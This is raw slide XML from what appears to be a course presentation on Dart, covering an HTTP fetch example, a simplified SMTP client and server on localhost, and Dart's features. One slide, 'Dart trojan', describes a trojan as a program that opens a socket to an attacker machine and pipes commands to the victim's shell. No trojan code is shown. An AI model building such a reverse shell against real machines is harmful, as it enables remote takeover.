              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  if (response.statusCode == 200) {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>	print('Response data: ${response.body}');</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  } else {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>	print('Error: ${response.statusCode}');</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  }</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>void main() {</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>  fetchData();</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1350"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="219" name="Google Shape;219;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4293125" y="679900"/>
            <a:ext cx="4625400" cy="743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Simplified SMTP Server-Client implementation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Google Shape;225;p20"/>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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Demonstration of sending emails from a Dart application using an SMTP server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The code will show the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>implementation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> of both server and client side.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The server waits for requests and when hearing it spawns an isolate to handle it.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> sends request to server and waits for response.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a0d279bb21_1_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SMTP Client Side</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Google Shape;231;g2a0d279bb21_1_50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434575" y="1152475"/>
            <a:ext cx="4817400" cy="37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import 'dart:io';</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400"/>
              <a:t>import 'dart:convert';</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void main() async {</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400"/>
              <a:t>  // Connect to the server</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400"/>
              <a:t>  var socket = await Socket.connect('localhost', 2500);</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400"/>
              <a:t>  print('Connected to: ${socket.remoteAddress.address}:${socket.remotePort}');</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  // Sending a simulated email</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400"/>
              <a:t>  String email = 'sender@example.com,recipient@example.com,Hello,This is a test email.';</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400"/>
              <a:t>  socket.write(email);</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 </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Google Shape;232;g2a0d279bb21_1_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33" name="Google Shape;233;g2a0d279bb21_1_50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5330925" y="1366525"/>
            <a:ext cx="3833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34" name="Google Shape;234;g2a0d279bb21_1_50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5059050" y="545725"/>
            <a:ext cx="3773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800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Google Shape;235;g2a0d279bb21_1_50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5470400" y="1237075"/>
            <a:ext cx="3701700" cy="294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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // Listening for a response</a:t>
            </a:r>
            <a:endParaRPr>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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  socket.listen(</a:t>
            </a:r>
            <a:endParaRPr>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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    (data) {</a:t>
            </a:r>
            <a:endParaRPr>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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      print('Response from server: ${utf8.decode(data)}');</a:t>
            </a:r>
            <a:endParaRPr>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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      // Now request the email back</a:t>
            </a:r>
            <a:endParaRPr>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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      socket.write('GET EMAIL');</a:t>
            </a:r>
            <a:endParaRPr>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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    },</a:t>
            </a:r>
            <a:endParaRPr>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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  );</a:t>
            </a:r>
            <a:endParaRPr>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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr>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a0d279bb21_1_71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="2571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t>import 'dart:io';</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>import 'dart:convert';</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GB" sz="1200"/>
              <a:t>class Email {</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>  String sender;</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>  String recipient;</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>  String subject;</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>  String body;</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GB" sz="1200"/>
              <a:t>  Email(this.sender, this.recipient, this.subject, this.body);</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>}</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None/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Google Shape;241;g2a0d279bb21_1_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42" name="Google Shape;242;g2a0d279bb21_1_71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3706525" y="1248825"/>
            <a:ext cx="5465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43" name="Google Shape;243;g2a0d279bb21_1_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SMTP Server Side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a0d279bb21_1_80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="375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void main() async {</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>  // List to store emails</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>  List&lt;Email&gt; emails =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GB" sz="1200"/>
              <a:t>  // Create a server listening on port 2500</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>  var server = await ServerSocket.bind(InternetAddress.anyIPv4, 2500);</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>  print('Listening on ${server.address.address}:${server.port}');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GB" sz="1200"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Google Shape;249;g2a0d279bb21_1_8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50" name="Google Shape;250;g2a0d279bb21_1_80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3965225" y="75250"/>
            <a:ext cx="5055900" cy="504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200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Wait for requests</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>await for (var client in server) {</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    client.listen((data) {</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      var message = String.fromCharCodes(data).trim();</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      if (message == 'GET EMAIL') {</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        if (emails.isNotEmpty) {</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	// send too client the first email</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          var email = emails.first;</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          client.write('Email from ${email.sender} to ${email.recipient}\nSubject: ${email.subject}\nBody: ${email.body}\n');</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        } else {</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          client.write('No emails stored.\n');</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        }</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      } else {</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	// Store the email</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        var parts = message.split(',');</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        var email = Email(parts[0], parts[1], parts[2], parts[3]);</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        emails.add(email);</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        client.write('Email stored.\n');</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      }</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    });</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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Google Shape;251;g2a0d279bb21_1_80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="3218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SMTP Server Side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a0d279bb21_0_9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Dart trojan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;g2a0d279bb21_0_9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Using what we learned from EPL421, a trojan is nothing but a program that opens a socket to an attacker machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>and pipes commands that it receives from the attacker to a shell inside the victim’s machine</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Google Shape;258;g2a0d279bb21_0_9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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857251" y="654701"/>
            <a:ext cx="4499264" cy="1020674"/>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What are Dart’s main features?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;66;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857251" y="1749020"/>
            <a:ext cx="3714750" cy="2649135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-332814" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="117647"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cross platform compatibility from a single codebase (Android/IOS/Windows/Linux/…)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-332814" lvl="0" marL="457200" rtl="0" algn="l">
